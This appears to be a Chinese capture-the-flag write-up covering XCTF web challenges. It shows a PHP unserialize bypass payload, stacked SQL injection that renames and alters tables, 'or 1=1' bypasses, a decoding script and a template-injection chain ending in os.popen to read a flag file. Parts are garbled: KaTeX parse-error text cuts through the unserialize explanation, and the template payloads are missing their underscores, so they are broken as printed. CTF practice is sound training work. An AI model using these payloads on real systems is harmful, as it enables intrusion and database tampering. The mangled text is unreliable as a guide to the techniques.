XCTF-web(五)

Web_php_unserialize

当通过KaTeX parse error: Expected group after '' at position 42: ...erialize,触发魔术方法_̲_wakeup和__destr...this->file)输出文件内容,若KaTeX parse error: Expected group after '' at position 17: ...ile可控,可读取任意文件。 _̲_wakeup 防御:若file不为index.php,会被重置为index.php。可通过属性个数溢出绕过(序列化时声明的属性个数大于实际个数,__wakeup不会执行)。

正则检测:preg_match('/[oc]:\d+:/i', $var)禁止包含o:或c:开头的序列化字符串。可利用NULL 字节截断让正则匹配失败(PHP 中preg_match遇到 NULL 字节会提前终止匹配)。

构造:/index.php?var=?TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

supersqli

看一下会输出什么

'1会报错

1';show databases -- #

1';show tables -- #

1';show columns from 1919810931114514 -- #

1';rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);-- #

1' or 1=1 #

inget

?id=1' or 1=1 -- #

web2

对密文进行 str_rot13 还原:由于 str_rot13 是双向变换,再次应用即可还原。

反转字符串:逆转加密时最后一步的 strrev。

Base64 解码:解开加密时的 base64_encode。

字符 ord 减 1:逆转加密时每个字符 ord+1 的操作。

再次反转字符串:逆转加密时第一步的 strrev。

csharp 复制代码
import base64
def python_decode(string):
    zimu = "abcdefghijklmnopqrstuvwxyz" 
    rot_13 ="" 
    for i in string: 
        if i.isdigit():
            rot_13 += i
        else:
            try:
                rot_13 += zimu[zimu.index(i)-13] 
            except:
                rot_13 += zimu[zimu.index(i.lower())-13].upper()
    fz = rot_13[::-1]
    base = base64.b64decode(fz)
    base = [chr(ord(i)-1) for i in base]
    fz = base[::-1]
    print "".join(fz)

python_decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws")

结果:flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

Web_python_template_injection

输入/{{7+7}},测试存在模板注入

/{{''.class}}

/{{''.class .mro}}

/{{''.class .base .base .subclasses()}}

/{{''.class .base .base .subclasses()[168]}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins 'eval'}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins ['eval']('import("os").popen("cat fl4g").read()')}}

相关推荐
killer Curry1 小时前
Polar CTF Reverse困难(1)
网络安全
世界尽头与你3 小时前
FastAPI Swagger Api 接口未授权访问漏洞
安全·网络安全·渗透测试·fastapi
Suckerbin3 小时前
vulnyx-Explorer靶场渗透
安全·web安全·网络安全
dollmarker3 小时前
vulnhub靶场之hacksudo: 2 (HackDudo)靶机-NFS提权
c语言·网络·网络安全·php
KivenMitnick4 小时前
CialloVOL 1.2:便捷好用的轻量化内存取证分析平台
windows·python·安全·网络安全·flask·系统安全·安全威胁分析
网络安全许木4 小时前
自学渗透测试第27天(基础补漏与工具的快捷键)
网络安全·渗透测试
锐速网络4 小时前
渗透测试中如何验证漏洞真实存在
web安全·网络安全·渗透测试·漏洞复现·sql注入·文件上传漏洞·漏洞验证
vortex55 小时前
守护开源世界的猎犬:ClamAV 软件包介绍
linux·网络安全
Suckerbin6 小时前
vulnyx-Reset靶场渗透
网络·web安全·网络安全
半个西瓜.17 小时前
车联网安全:GPS定位测试.(静态欺骗)
网络·安全·网络安全·车载系统·安全威胁分析